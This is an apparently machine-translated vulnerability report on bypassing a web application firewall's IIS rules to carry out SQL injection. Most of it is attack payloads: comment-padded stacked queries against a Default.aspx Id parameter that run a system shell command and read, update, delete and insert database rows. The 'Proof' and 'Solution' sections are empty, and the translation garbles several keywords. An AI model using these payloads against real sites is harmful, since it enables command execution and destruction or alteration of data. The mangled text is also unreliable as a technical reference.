Attackers can execute arbitrary SQL statements by bypassing the latest website security dog (IIS) protection rules.

Attackers can execute arbitrary SQL statements by bypassing the latest website security dog (IIS) protection rules.

Attackers can execute arbitrary SQL statements by bypassing protection rules...

Detailed description:

There are still many websites with SQL injection, and there is no interception in the code.

We construct an SQL injection. In this case, the dongle intercepts the injection.

/Default. aspx? Id = 481942; DECLARE/**/@ s VARCHAR (2000); SET @ s = 'xp _ javasshell ''dir''; EXEC (@ s)

Here is the time to witness the miracle! Add any characters in the middle of/**/, such as/* 1...

/Default. aspx? Id = 481942; DECLARE/* 1 */@ s VARCHAR (2000); SET @ s = 'xp _ javasshell ''' dir''; EXEC (@ s)

In this case, you can add, delete, query, and modify the content.

-- Execute Command

/Default. aspx? Id = 481942; DECLARE/* 1 */@ s VARCHAR (2000); SET @ s = 'xp _ javasshell ''' dir''; EXEC (@ s)

-- Query

/Default. aspx? Id = 481942; DECLARE/* 2 */@ s VARCHAR (2000); SET @ s = replace ('select * fxxxm Online_tj ', 'xxx', 'ro '); EXEC (@ s )--

-- Modify

/Default. aspx? Id = 481942; DECLARE/* 2 */@ s VARCHAR (2000); SET @ s = 'Update Online_tj xxxt logtime = 1 where id = 1'; EXEC (@ s )--

-- Delete

/Default. aspx? Id = 481942; DECLARE/* 2 */@ s VARCHAR (2000); SET @ s = replace ('delete Online_tj where id = 1', 'xxx ', 'se'); EXEC (@ s )--

-- Add

/Default. aspx? Id = 481942; DECLARE/* 2 */@ s VARCHAR (2000); SET @ s = 'insert Online_tj values ('000000') '; EXEC (@ s )--

Proof of vulnerability:

Solution:

You are more professional than me!